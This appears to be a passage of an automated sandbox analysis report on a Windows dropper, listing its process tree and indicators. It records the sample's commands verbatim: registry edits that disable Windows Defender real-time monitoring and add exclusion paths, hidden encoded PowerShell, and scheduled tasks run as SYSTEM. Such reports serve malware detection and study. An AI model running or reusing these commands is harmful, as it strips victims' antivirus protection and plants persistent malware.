SeBackupPrivilege 1692 WMIC.exe Token: SeRestorePrivilege 1692 WMIC.exe Token: SeShutdownPrivilege 1692 WMIC.exe Token: SeSystemEnvironmentPrivilege 1692 WMIC.exe Token: SeUndockPrivilege 1692 WMIC.exe Token: SeManageVolumePrivilege 1692 WMIC.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1416 WMIC.exe Token: SeIncreaseQuotaPrivilege 1416 WMIC.exe Token: SeSecurityPrivilege 1416 WMIC.exe Token: SeTakeOwnershipPrivilege 1416 WMIC.exe Token: SeLoadDriverPrivilege 1416 WMIC.exe Token: SeSystemtimePrivilege 1416 WMIC.exe Token: SeBackupPrivilege 1416 WMIC.exe Token: SeRestorePrivilege 1416 WMIC.exe Token: SeShutdownPrivilege 1416 WMIC.exe Token: SeSystemEnvironmentPrivilege 1416 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1884 wrote to memory of 2564 1884 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 28 PID 1884 wrote to memory of 2564 1884 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 28 PID 1884 wrote to memory of 2564 1884 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 28 PID 1884 wrote to memory of 2564 1884 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 28 PID 1884 wrote to memory of 2564 1884 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 28 PID 1884 wrote to memory of 2564 1884 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 28 PID 1884 wrote to memory of 2564 1884 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 28 PID 2564 wrote to memory of 2628 2564 Install.exe 29 PID 2564 wrote to memory of 2628 2564 Install.exe 29 PID 2564 wrote to memory of 2628 2564 Install.exe 29 PID 2564 wrote to memory of 2628 2564 Install.exe 29 PID 2564 wrote to memory of 2628 2564 Install.exe 29 PID 2564 wrote to memory of 2628 2564 Install.exe 29 PID 2564 wrote to memory of 2628 2564 Install.exe 29 PID 2628 wrote to memory of 2708 2628 Install.exe 30 PID 2628 wrote to memory of 2708 2628 Install.exe 30 PID 2628 wrote to memory of 2708 2628 Install.exe 30 PID 2628 wrote to memory of 2708 2628 Install.exe 30 PID 2628 wrote to memory of 2708 2628 Install.exe 30 PID 2628 wrote to memory of 2708 2628 Install.exe 30 PID 2628 wrote to memory of 2708 2628 Install.exe 30 PID 2708 wrote to memory of 2436 2708 cmd.exe 32 PID 2708 wrote to memory of 2436 2708 cmd.exe 32 PID 2708 wrote to memory of 2436 2708 cmd.exe 32 PID 2708 wrote to memory of 2436 2708 cmd.exe 32 PID 2708 wrote to memory of 2436 2708 cmd.exe 32 PID 2708 wrote to memory of 2436 2708 cmd.exe 32 PID 2708 wrote to memory of 2436 2708 cmd.exe 32 PID 2436 wrote to memory of 2736 2436 forfiles.exe 33 PID 2436 wrote to memory of 2736 2436 forfiles.exe 33 PID 2436 wrote to memory of 2736 2436 forfiles.exe 33 PID 2436 wrote to memory of 2736 2436 forfiles.exe 33 PID 2436 wrote to memory of 2736 2436 forfiles.exe 33 PID 2436 wrote to memory of 2736 2436 forfiles.exe 33 PID 2436 wrote to memory of 2736 2436 forfiles.exe 33 PID 2736 wrote to memory of 2588 2736 cmd.exe 34 PID 2736 wrote to memory of 2588 2736 cmd.exe 34 PID 2736 wrote to memory of 2588 2736 cmd.exe 34 PID 2736 wrote to memory of 2588 2736 cmd.exe 34 PID 2736 wrote to memory of 2588 2736 cmd.exe 34 PID 2736 wrote to memory of 2588 2736 cmd.exe 34 PID 2736 wrote to memory of 2588 2736 cmd.exe 34 PID 2708 wrote to memory of 2744 2708 cmd.exe 35 PID 2708 wrote to memory of 2744 2708 cmd.exe 35 PID 2708 wrote to memory of 2744 2708 cmd.exe 35 PID 2708 wrote to memory of 2744 2708 cmd.exe 35 PID 2708 wrote to memory of 2744 2708 cmd.exe 35 PID 2708 wrote to memory of 2744 2708 cmd.exe 35 PID 2708 wrote to memory of 2744 2708 cmd.exe 35 PID 2744 wrote to memory of 2508 2744 forfiles.exe 36 PID 2744 wrote to memory of 2508 2744 forfiles.exe 36 PID 2744 wrote to memory of 2508 2744 forfiles.exe 36 PID 2744 wrote to memory of 2508 2744 forfiles.exe 36 PID 2744 wrote to memory of 2508 2744 forfiles.exe 36 PID 2744 wrote to memory of 2508 2744 forfiles.exe 36 PID 2744 wrote to memory of 2508 2744 forfiles.exe 36 PID 2508 wrote to memory of 2800 2508 cmd.exe 37 PID 2508 wrote to memory of 2800 2508 cmd.exe 37 PID 2508 wrote to memory of 2800 2508 cmd.exe 37 PID 2508 wrote to memory of 2800 2508 cmd.exe 37 PID 2508 wrote to memory of 2800 2508 cmd.exe 37 PID 2508 wrote to memory of 2800 2508 cmd.exe 37 PID 2508 wrote to memory of 2800 2508 cmd.exe 37 PID 2708 wrote to memory of 2784 2708 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe"C:\Users\Admin\AppData\Local\Temp\bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\7zS1DDD.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Users\Admin\AppData\Local\Temp\7zS1FB1.tmp\Install.exe.\Install.exe /FddidfBPP "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2588
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2800
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2784
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2968
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2156
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2584
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2472
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2468
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2488
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2504
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:1880
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:1492
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:1460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "baOmDneVXoOuKLmJPZ" /SC once /ST 23:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exe\" 4w /VZydidGlTW 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1452
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn baOmDneVXoOuKLmJPZ"4⤵PID:2532
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn baOmDneVXoOuKLmJPZ5⤵PID:1364
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn baOmDneVXoOuKLmJPZ6⤵PID:1444
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D7CC79BF-403D-48F1-979A-54979512F035} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2364
-
C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exeC:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exe 4w /VZydidGlTW 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1660
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1936
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1940
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2248
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1980
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2172
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1680
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:1220
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2228
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2888
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2880
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2452
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2456
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2276
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1664
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:352 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:972
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTuxKqbKc" /SC once /ST 13:21:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTuxKqbKc"3⤵PID:1788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTuxKqbKc"3⤵PID:1976
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2900
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1572
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2168
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkCorfxfY" /SC once /ST 11:47:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkCorfxfY"3⤵PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkCorfxfY"3⤵PID:2944
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2972
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:323⤵PID:2928
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:643⤵PID:1740
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:323⤵PID:2128
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:324⤵PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:643⤵PID:1752
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:644⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\TtNtWPRQARDvDBvI\llSOOLGu\fdYZfjAUxeGwrLEN.wsf"3⤵PID:1460
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\TtNtWPRQARDvDBvI\llSOOLGu\fdYZfjAUxeGwrLEN.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2212 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:688
-
-
